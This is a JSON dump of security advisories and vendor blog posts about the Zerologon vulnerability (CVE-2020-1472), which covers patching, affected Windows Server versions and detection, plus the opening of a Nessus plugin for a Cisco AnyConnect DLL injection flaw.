"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:34", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "Microsoft addressed a critical remote code execution vulnerability affecting the Netlogon protocol (CVE-2020-1472) on August 11, 2020. Beginning with the February 9, 2021 Security Update release, Domain Controllers will be placed in enforcement mode. This will require all Windows and non-Windows devices to use secure Remote Procedure Call (RPC) with Netlogon secure channel or to explicitly allow the account by adding an exception for any non-compliant device.\n\nCISA encourages users and administrators to review the Microsoft [security update](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>) and apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/02/10/microsoft-launches-phase-2-mitigation-netlogon-remote-code>); we'd welcome your feedback.\n", "modified": "2021-02-10T00:00:00", "published": "2021-02-10T00:00:00", "id": "CISA:E5A33B5356175BB63C2EFA605346F8C7", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/02/10/microsoft-launches-phase-2-mitigation-netlogon-remote-code", "type": "cisa", "title": "Microsoft Launches Phase 2 Mitigation for Netlogon Remote Code Execution Vulnerability (CVE-2020-1472) ", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:42", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "The CERT Coordination Center (CERT/CC) has released information on CVE-2020-1472, a vulnerability affecting Microsoft Windows Netlogon Remote Protocol. An unauthenticated attacker could exploit this vulnerability to obtain Active Directory domain administrator access. Although Microsoft provided patches for CVE-2020-1472 in August 2020, unpatched systems will be an attractive target for malicious actors.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA), encourages users and administrators to review the following resources and apply the necessary updates and workaround.\n\n * CERT/CC Vulnerability Note [VU#490028](<https://www.kb.cert.org/vuls/id/490028>)\n * Microsoft\u2019s Security Advisory for [CVE-2020-1472](< https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)\n * Microsoft\u2019s guidance on [How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>)\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/09/17/certcc-releases-information-critical-vulnerability-microsoft>); we'd welcome your feedback.\n", "modified": "2020-09-17T00:00:00", "published": "2020-09-17T00:00:00", "id": "CISA:7E93687DEED7F2EA7EFAEBA997B30A5D", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/09/17/certcc-releases-information-critical-vulnerability-microsoft", "type": "cisa", "title": "CERT/CC Releases Information on Critical Vulnerability in Microsoft Windows Netlogon Remote Protocol", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:42", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "The Cybersecurity and Infrastructure Security Agency (CISA) has released [Emergency Directive (ED) 20-04](<https://cyber.dhs.gov/ed/20-04/ >) addressing a critical vulnerability\u2014 CVE-2020-1472\u2014affecting Microsoft Windows Netlogon Remote Protocol. An unauthenticated attacker with network access to a domain controller could exploit this vulnerability to compromise all Active Directory identity services.\n\nEarlier this month, [exploit code for this vulnerability was publicly released](<https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472>). Given the nature of the exploit and documented adversary behavior, CISA assumes active exploitation of this vulnerability is occurring in the wild.\n\nED 20-04 applies to Executive Branch departments and agencies; however, CISA strongly recommends state and local governments, the private sector, and others patch this critical vulnerability as soon as possible. Review the following resources for more information:\n\n * [CISA Emergency Directive 20-04: Mitigate Netlogon Elevation of Privilege Vulnerability from August 2020 Patch Tuesday](<https://cyber.dhs.gov/ed/20-04/>)\n * [CERT/CC Vulnerability Note [VU#490028]](<https://www.kb.cert.org/vuls/id/490028>)\n * [Microsoft Security Vulnerability Information for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)\n * Microsoft\u2019s guidance on [How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>)\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/09/18/cisa-releases-emergency-directive-microsoft-windows-netlogon>); we'd welcome your feedback.\n", "modified": "2020-09-18T00:00:00", "published": "2020-09-18T00:00:00", "id": "CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/09/18/cisa-releases-emergency-directive-microsoft-windows-netlogon", "type": "cisa", "title": "CISA Releases Emergency Directive on Microsoft Windows Netlogon Remote Protocol", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2020-09-29T08:39:08", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "### Updates September 16, 2020\n\n\n\nSamba domain controllers before 4.8 [have been confirmed](<https://twitter.com/certcc/status/1306279825519382528>) to be vulnerable to CVE-2020-1472. There are now multiple public [PoC exploits](<https://github.com/bb00/zer0dump>) available, most if not all of which are [modifications](<https://github.com/risksense/zerologon>) to Secura\u2019s original PoC built on Impacket. There are reports of the vulnerability's being actively exploited in the wild, including to spread ransomware. The maintainer of popular post-exploitation tool Mimikatz has also [announced a new release](<https://twitter.com/gentilkiwi/status/1306178689630076929>) of the tool that integrates Zerologon detection and exploitation support. Several threads on [exploitation traces](<https://twitter.com/SBousseaden/status/1304867515844243458>) and [community detection rules](<https://twitter.com/andriinb/status/1304676530350628864>) have also garnered attention from researchers and security engineers.\n\n### (Original text)\n\nEarlier today (September 14, 2020), security firm Secura published a [technical paper](<https://www.secura.com/pathtoimg.php?id=2055>) on CVE-2020-1472, a [CVSS-10 privilege escalation vulnerability](<https://attackerkb.com/topics/7FbcgDOidQ/cve-2020-1472?referrer=blog#rapid7-analysis>) in Microsoft\u2019s Netlogon authentication process that the paper's authors christened \u201cZerologon.\u201d The vulnerability, which was [partially patched](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) in Microsoft\u2019s August 2020 Patch Tuesday release, arises from a flaw in the cryptographic implementation of the Netlogon protocol, specifically in its usage of AES-CFB8 encryption. The impact of successful exploitation is enormous: The flaw allows for full takeover of Active Directory domains by compromising Windows Servers running as domain controllers\u2014in Secura\u2019s words, enabling \u201can attacker with a foothold on your internal network to essentially become Domain Admin with one click. All that is required is for a connection to the Domain Controller to be possible from the attacker\u2019s viewpoint.\u201d This RPC connection can be made either directly or over SMB via namedpipes.\n\nSecura\u2019s blog includes [proof-of-concept (PoC) code](<https://github.com/SecuraBV/CVE-2020-1472>) that performs the authentication bypass and is easily able to be weaponized for use in attacker operations, including ransomware and other malware propagation. It\u2019s unlikely that it will take long for a fully weaponized exploit (or several) to hit the internet.\n\n[InsightVM](<https://www.rapid7.com/products/insightvm/>) customers can assess their exposure to CVE-2020-1472 with an [authenticated check](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-1472>). Organizations that have not already applied Microsoft\u2019s August 11, 2020 security updates are urged to consider patching CVE-2020-1472 on an emergency basis. Microsoft customers who have successfully applied the August 2020 security updates can deploy Domain Controller (DC) enforcement mode either now or after the Q1 2021 update that includes the second part of the patch for this vulnerability. Microsoft [has guidance here](<https://support.microsoft.com/kb/4557222>) on how to manage changes in Netlogon secure channel connections associated with this vulnerability.\n\nFor more Rapid7 analysis, further evaluation of Secura\u2019s technical paper, and guidance, see Zerologon\u2019s [AttackerKB entry here](<https://attackerkb.com/topics/7FbcgDOidQ/cve-2020-1472?referrer=blog#rapid7-analysis>).\n\n### Affected products\n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2012 R2 (Server Core installation)\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n\n### References\n\n * <https://attackerkb.com/topics/7FbcgDOidQ/cve-2020-1472?referrer=blog#rapid7-analysis>\n * <https://www.secura.com/pathtoimg.php?id=2055>\n * <https://www.zdnet.com/article/zerologon-attack-lets-hackers-take-over-enterprise-networks/>\n * <https://github.com/SecuraBV/CVE-2020-1472>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>", "modified": "2020-09-14T23:29:59", "published": "2020-09-14T23:29:59", "id": "RAPID7BLOG:C628D3D68DF3AE5A40A1F0C9DFA38860", "href": "https://blog.rapid7.com/2020/09/14/cve-2020-1472-zerologon-critical-privilege-escalation/", "type": "rapid7blog", "title": "CVE-2020-1472 \"Zerologon\" Critical Privilege Escalation: What You Need To Know", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-19T14:41:15", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "\n\n[Windows Server 2008 and 2008 R2](<https://www.microsoft.com/en-us/cloud-platform/windows-server-2008>) reached their end of life (EOL) on Jan. 14, 2020. What does that mean in practice? Well, any instances running these versions of Windows Server are no longer supported by Microsoft\u2014no more automated fixes, updates, or technical assistance. \n\nFrom a security standpoint, any exploits that appear after Jan. 14 that affect these specific versions of Windows will not likely be addressed for the vast majority of installations. Though there have been [exceptions to end of support](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/revised-end-of-service-date-for-windows-10-version-1803-may-11/ba-p/1614136>) under unusual circumstances, such as the extension of support for Windows 10 in light of the unprecedented COVID-19 pandemic, such exceptions shouldn\u2019t be expected to be the norm.\n\nThrough a sampling of some of our data, we realized that even as of the date of this post, there were many instances of Windows Server 2008 still running in the wild\u2014and by extension, associated variations of dependent software, such as Microsoft Internet Information Services (IIS) version 7.0 and 7.5. \nWe took a more systematic look at the prevalence of the different versions of Windows Server that are floating out on the open internet. We performed a number of internet-wide scans using [Project Sonar](<https://www.rapid7.com/research/project-sonar/>), and fingerprinted the returned data using [Recog](<https://blog.rapid7.com/2020/04/08/self-isolation-home-networking-and-open-source-recog-and-rumble/>), when possible, to enable us to identify specific versions of Windows Server.\n\n\n\nWhat we found was alarming: Over the course of September 2020, 59% of all uniquely observed instances of Windows Server were unsupported, while 41% were supported. However, the uneven balance of dangerous versus safe services that we observed is not terribly unusual. It seems to be more the norm that the preponderance of actively running services on the internet are outdated, unsupported, improperly patched, or insecure. For examples, see any number of Rapid7\u2019s past blog posts, including reflections on the state of [PHP](<https://blog.rapid7.com/2018/12/17/charting-the-forthcoming-phpocalypse-in-2019/>) and [Microsoft Exchange](<https://blog.rapid7.com/2020/09/29/microsoft-exchange-2010-end-of-support-and-overall-patching-study/>).\n\nWe were also able to identify the countries in which these unsupported Windows Server instances were located, and determined (without much surprise) that the heaviest concentrations were in the United States and China.\n\n\n\nOn the other hand, the heaviest concentrations of _supported_ versions of Windows Server were _also _the United States and China, though if we examine the coloration scale more closely, we do see that the numbers for unsupported versions are significantly larger than supported.\n\n\n\nFor a more direct comparison of supported versions of Windows Server against unsupported versions within countries, we calculated the difference between the two classes within each country. This allowed us to get past a consideration of the raw prevalence of Windows Server within particular countries. In this case, we found that Poland manifested itself particularly well, with the most dramatic difference in terms of absolute counts of supported over unsupported versions, while the United States appeared the worst off, with nearly half a million more instances of unsupported versions than supported.\n\n\n\nThere is also observable variation between hosting service providers within countries in terms of unsupported Windows Server instances. For instance, we can note that Hangzhou Alibaba Advertising hosts by a wide margin the most instances of unsupported Windows Server instances within China.\n\n\n\nWhile we can assert that the state of Windows Server security across the internet in this latest month doesn\u2019t look great, there does appear to be some level of progress. Over the past several months, we have observed a notable decline in the number of unsupported variants of Windows Server - including Windows Server 2003, 2008, and their various release candidates.\n\n\n\nThe decline in usage of Server 2008 and Server 2008 R2 amounted to approximately 40,000 and over 2,000,000 instances, respectively. The net decline that we observed in Windows Server instances does comport with what other internet researchers have observed as well. For instance, Netcraft noted a [shift from Windows web servers to OpenResty](<https://news.netcraft.com/archives/category/web-server-survey/>). There was an unusual spike in counts (though not terribly significant in terms of absolute numbers) for Server 2003 R2 that we noticed and are still looking into, though at this time, our best guess is this is simply a manifestation of the somewhat stochastic spirit of Sonar.\n\n\n\nHow severe is all this? Well, it really depends on the types of vulnerabilities and exploits that crop up and how Microsoft decides to respond. \n\nFor instance, in early September, the [Zerologon (CVE-2020-1472) vulnerability](<https://blog.rapid7.com/2020/09/14/cve-2020-1472-zerologon-critical-privilege-escalation/>) was publicly disclosed, with a whopping CVSSv3 rating of 10.0 (i.e., as bad as it gets). This allowed for the elevation of privileges up to a domain admin level by exploiting a cryptographic weakness in the [Netlogon Remote Protocol](<https://www.secura.com/blog/zero-logon>). The vulnerability affected a number of versions of Windows Server. Microsoft addressed the Netlogon vulnerability with a round of patches in August, which fortuitously included a patch for Windows Server 2008 R2 SP 1 (based on the information released and some testing by Rapid7 Principal Security Researcher Tom Sellers, it seems that Windows Server 2008 is not susceptible to [Zerologon](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>)). \n\nWithout the good graces of Microsoft, the Zerologon vulnerability could have become a perpetual vulnerability for millions of Windows Server 2008 R2 instances that remain open on the public internet. Imagine the prospecting opportunities for malicious actors yearning for domain admin access to critical enterprise production systems. Quite frankly, given the recency of the patch and the tendency for patches to be slow in application, it wouldn\u2019t be surprising at all if there are many extant Windows Server 2008 instances that remain unpatched and severely exploitable, presenting ripe opportunities for mayhem.\n\nHere are some key actions that can be performed to minimize the risk posed by the usage unsupported Windows Server versions:\n\n * Stop using unsupported Windows Server versions. Migrate to a more recent and active version of Windows Server (or, if you are to follow Microsoft\u2019s advice, simply migrate to the cloud and embrace [Microsoft Azure](<https://www.microsoft.com/en-us/cloud-platform/windows-server-2008>)).\n * Remove public access to unsupported versions of Windows Server.\n * If there remains a need to continue using unsupported versions, at the very least, apply past available patches. This doesn\u2019t fully address the concerns manifesting from using unsupported versions, such as newly discovered zero-day exploits, but it does at least mitigate some past lingering risks.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "modified": "2020-10-19T13:06:38", "published": "2020-10-19T13:06:38", "id": "RAPID7BLOG:486F801929E1F794197FC08AE13E4CB5", "href": "https://blog.rapid7.com/2020/10/19/are-you-still-running-end-of-life-windows-servers/", "type": "rapid7blog", "title": "Are You Still Running End-of-Life Windows Servers?", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "pentestpartners": [{"lastseen": "2020-09-23T14:54:17", "bulletinFamily": "blog", "cvelist": ["CVE-2020-1350", "CVE-2020-1472"], "description": "### \n\n### TL;DR\n\nYes, apply the update from Microsoft.\n\n### The new MS08-067?\n\nCVE-2020-1472 is an elevation of privilege vulnerability in a cryptographic authentication scheme used by the Netlogon service and was discovered (and named Zerologon) by Tom Tervoort at [Secura](<https://www.secura.com/blog/zero-logon>). It does not require authentication. It can be used by an attacker to remotely compromise a domain controller, the result being domain admin access. That pretty much as bad as it gets, naturally it is rated critical by [Microsoft](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>).\n\nThe vulnerability was patched in August 2020 in the first of a 2 part update, the first mitigates, the second (coming in 2021) fully closes it.\n\n### What\u2019s affected?\n\nAll flavours of Microsoft Windows Server, including server core. Though the impact is predominantly going to affect your domain controllers.\n\nSome versions of Linux are also vulnerable, [SUSE](<https://www.suse.com/support/kb/doc/?id=000019713>), [Red Hat](<https://access.redhat.com/security/cve/CVE-2020-1472>)\n\n### Is it a risk for me?\n\nCommonly when Microsoft release a critical update the Infosec community make a big deal out of the vulnerability, rightly so in some cases, but in others often there is not actual public exploit code available. Now that doesn\u2019t mean there isn\u2019t code available in private groups and that those risks shouldn\u2019t be taken seriously, but the absence of exploit code does make the bar of exploit that little bit higher. Unlike [some cases](<https://blog.zsec.uk/cve-2020-1350-research/>), in Zerologon\u2019s case there are currently 31 repositories on Github which purport to reference the vulnerability:\n\n\n\nThese range from a basic detection type script through to full takeover of a domain. Whilst we cannot confirm the authenticity of all of these, some are known to function as expected, they should be taken seriously.\n\nAs exploits develop they are getting more advanced, the early attacks would render the domain controller the exploit was run on unusable, this is now getting refined to allow the attacker to recover the domain controller. The code is even being added to the popular [Mimikatz](<https://github.com/gentilkiwi/mimikatz>) exploitation tool.\n\nThere is a risk that disgruntled internal staff will exploit this, right now there are no known PowerShell versions of this exploit and so short of an internal staff member using their own laptop it\u2019s unlikely that they will have the toolset to exploit it\u2026however, this will change.\n\nThe threat is real. This is becoming a \u2018point and click\u2019 type exploit.\n\n### What mitigating factors are there?\n\nIn order to exploit the vulnerability the attacker does need to be on the local area network, however, does not need credentials. This does mean an attacker needs to be inside your network boundary, but this could be achieved in many ways, most obviously through a phishing attach, but that may not be necessary\u2026 Have you got wired network points in public meeting rooms? How secure is your wireless?\n\nA read only domain controller is also likely affected, but it is unclear in what way. Read only domain controllers may increase the risk to your organisation as commonly these are placed outside the trust boundaries.\n\nThe exploit currently breaks the domain controller it is exploited on and so it is unlikely that responsible security consultants will execute the exploit, however, unknown threat actors are likely to. This is also likely to be improved as time goes on.\n\nThen\u2026well\u2026 there is the patch obviously.\n\nOnce you have applied the patch you can enable some [registry keys](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>) that will enable DC enforcement, this will deny vulnerable Netlogon connections unless the account is allowed. Note, this will become the default in early 2021 as Microsoft will release a second update to implement this.\n\n### Detecting the exploit\n\nThere are a handful of rules you can add to your security monitoring server (thank you [Corelight](<https://corelight.blog/2020/09/16/detecting-zerologon-cve-2020-1472-with-zeek/>) for these links).\n\n * [Splunk](<https://www.linkedin.com/feed/update/urn:li:activity:6711471711751168000/>)\n * [Sigma](<https://twitter.com/andriinb/status/1304676530350628864?s=1>)\n * [Zeek](<https://github.com/corelight/zerologon>)\n\nEvent ID 4742 is worth monitoring, that will show changes to a computer account which is what Zerologon is doing. Though sadly this will likely only show you have already been compromised\n\nThere are a number of other detection options in [this blog from Lares](<https://www.lares.com/blog/from-lares-labs-defensive-guidance-for-zerologon-cve-2020-1472/>). Though sadly, like the above, this will likely only show you have already been compromised\n\n### Conclusion\n\nSo in short, yes you should worry, this will be exploited for many years to come, we are still seeing MS08-067 in use, the exploits will get more reliable. The risk is very much real and the impact is as severe as it gets for an enterprise domain.\n\nThis is currently a changing threat, more and more researchers are looking at this and finding novel ways to exploit it.\n\nGet patching!\n\nThe post [CVE-2020-1472/Zerologon. As an IT manager should I worry?](<https://www.pentestpartners.com/security-blog/cve-2020-1472-zerologon-as-an-it-manager-should-i-worry/>) first appeared on [Pen Test Partners](<https://www.pentestpartners.com/>).", "modified": "2020-09-23T05:05:06", "published": "2020-09-23T05:05:06", "id": "PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0", "href": "https://www.pentestpartners.com/security-blog/cve-2020-1472-zerologon-as-an-it-manager-should-i-worry/", "type": "pentestpartners", "title": "CVE-2020-1472/Zerologon. As an IT manager should I worry?", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2020-10-02T12:43:58", "bulletinFamily": "blog", "cvelist": ["CVE-2020-1472"], "description": "**Update October 1, 2020**: Microsoft has [added step-by-step Zerologon patching instructions ](<https://www.databreachtoday.com/microsoft-issues-updated-patching-directions-for-zerologon-a-15090>)because the original instructions &quot;proved confusing to users and may have caused issues with other business operations.&quot;\n\n**Update October 1, 2020**: Qualys released new QID 91680 to add a remote (unauthenticated) check for the Zerologon vulnerability. The update is included in VULNSIGS-2.4.998-3 and later. \n\n_`QID 91680 : Microsoft Windows Netlogon Elevation of Privilege Vulnerability (unauthenticated check)`_\n\n**Update Sept 24, 2020**: Microsoft is detecting [active attacks leveraging the Zerologon vulnerability](<https://www.zdnet.com/article/microsoft-says-it-detected-active-attacks-leveraging-zerologon-vulnerability/>). Security teams are advised to patch vulnerable systems immediately.\n\nOn Sept 11, 2020, A Dutch team, collectively known as Secura, published an [exploit](<https://github.com/SecuraBV/CVE-2020-1472>) on how an unauthenticated remote user can take control over the domain controller and leverage admin privileges. The vulnerability ([CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)) received the maximum severity rating score of 10.0 based on CVSS v3 Scoring system.\n\nThe prime elements of this vulnerability are the weak encryption standards and the authentication process used in the Netlogon protocol. As new Windows Domain Controllers use standard AES-256 as encryption standards, incorrect use of the AES mode results in spoofing the identity of any computer (DC) account and replace it with all zeroes or empty passwords. As the final output replaces all characters of the password with zeroes, this bug is also well-known as \u201cZerologon\u201d.\n\n**Affected Products**\n\n * Windows Servers 2008\n * Windows Servers 2012 R2\n * Windows Servers 2016\n * Windows Servers 2019\n\nA complete list of affected devices is available on Microsoft\u2019s August 2020 security [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>).\n\n### Identification of Assets using Qualys VMDR\n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify Windows systems.\n\n_`(operatingSystem.category1:``Windows`` and operatingSystem.category2:``Server``)`_\n\n\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, let\u2019s say \u2013 &quot;Zerologon&quot;. This helps in automatically grouping existing hosts with Zerologon as well as any new Windows server that spins up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>). \n\n### Discover Zerologon &quot;CVE-2020-1472&quot; Vulnerability\n\nNow that hosts with Zerologon are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like Zerologon based on the always updated Knowledgebase.\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Zerologon\u2019 asset tag in the vulnerabilities view by using this QQL query:\n\n_`vulnerabilities.vulnerability.qid:91668`_\n\nOR you could modify your search to :\n\n_`Vulnerability - vulnerabilities.vulnerability.qid:91668`_\n\n_`Asset - (operatingSystem.category1:``Windows`` and operatingSystem.category2:``Server``)`_\n\nThis will return a list of all impacted hosts.\n\n\n\nQID 91668 is available in signature version VULNSIGS-2.4.958-3 and above and can be detected using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.4.958.3-2 and above.\n\nAlong with the QID 91668, Qualys released the following IG QID 45461 to help customers track domain controller assets on which netlogon secure channel mode is enabled. This QID can be detected using authenticated scanning using VULNSIGS-2.4.986-3 and above or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.4.986.3-2 and above. \n\n_`QID 45461 : Microsoft Windows Domain Controller Netlogon Secure Channel Enforcement Mode Enabled`_\n\n**Update October 1, 2020**: Qualys released new QID 91680 to add a remote (unauthenticated) check for the Zerologon vulnerability. The update is included in VULNSIGS-2.4.998-3 and later.\n\n_`QID 91680 : Microsoft Windows Netlogon Elevation of Privilege Vulnerability (unauthenticated check)`_\n\nPlease Note: We have tested the QID across Qualys lab environment on a variety of Windows versions, and we have not observed any issues. In case you experience issues with the remote detection, please reach out to Qualys Support for immediate attention.\n\nUsing VMDR, the Zerologon vulnerability can be prioritized for the following real-time threat indicators (RTIs):\n\n * Remote Code Execution\n * Privilege Escalation\n * Exploit Public\n * Active Attack\n * Denial of Service\n * High Data Loss\n * High Lateral Movement\n * Predicted High Risk\n\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\n\n\nSimply click on the impacted assets for the Zerologon threat feed to see the vulnerability and impacted host details. \n\nWith VMDR Dashboard, you can track Zerologon, impacted hosts, their status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of Zerologon vulnerability trends in your environment using [Zerologon Dashboard Link](<https://qualys-secure.force.com/customer/s/article/000006405>).\n\n\n\n### Response by Patching and Remediation \n\nVMDR rapidly remediates the Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select \u201cqid: 91668\u201d in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go for hosts grouped together by a tag \u2013 Zerologon. \n\n\n\nFor proactive, continuous patching, you can create a job without a Patch Window to ensure all hosts will continue to receive the required patches as new patches become available for emerging vulnerabilities.\n\nUsers are encouraged to apply patches as soon as possible.\n\n### Solution\n\nUsers are advised to review their Microsoft Windows installations with Microsoft\u2019s August 2020 security [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) mentioned above. For Windows devices, a patch to be published in Feb 2021 would place Domain controllers in enforcement mode; to explicitly allow the account by adding an exception for any non-compliant device.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority Zerologon vulnerability CVE-2020-1472.\n\n### **References**\n\n<https://www.secura.com/pathtoimg.php?id=2055>\n\n<https://github.com/SecuraBV/CVE-2020-1472>\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472>", "modified": "2020-09-15T19:55:08", "published": "2020-09-15T19:55:08", "id": "QUALYSBLOG:192411B44569225E2F2632594DC4308C", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "Microsoft Netlogon Vulnerability (CVE-2020-1472 \u2013 Zerologon) \u2013 Automatically Discover, Prioritize and Remediate Using Qualys VMDR\u00ae", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-03-03T01:42:46", "description": "The version of tested product installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the cisco-sa-anyconnect-dll-injec-pQnryXLf advisory. Note that Nessus has not tested for\nthis issue but has instead relied only on the application's self-reported version number.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-14T00:00:00", "title": "Cisco AnyConnect Secure Mobility Client for Windows DLL Injection (cisco-sa-anyconnect-dll-injec-pQnryXLf)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1237"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/a:cisco:anyconnect_secure_mobility_client"], "id": "CISCO-SA-ANYCONNECT-DLL-INJEC-PQNRYXLF.NASL", "href": "https://www.tenable.com/plugins/nessus/144945", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144945);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/01\");\n\n script_cve_id(\"CVE-2021-1237\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvw16727\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-anyconnect-dll-injec-pQnryXLf\");\n script_xref(name:\"IAVA\", value:\"2021-A-0025-S\");\n\n script_name(english:\"Cisco AnyConnect Secure Mobility Client for Windows DLL Injection (cisco-sa-anyconnect-dll-injec-pQnryXLf)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of tested product installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the cisco-sa-anyconnect-dll-injec-pQnryXLf advisory. Note that Nessus has not tested for\nthis issue but has instead relied only on the application's self-reported version number.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-dll-injec-pQnryXLf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9a7b1b31\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvw16727\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID CSCvw16727\");\n script_set_attribute(attribute:\"agent\", value:\"windows\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n 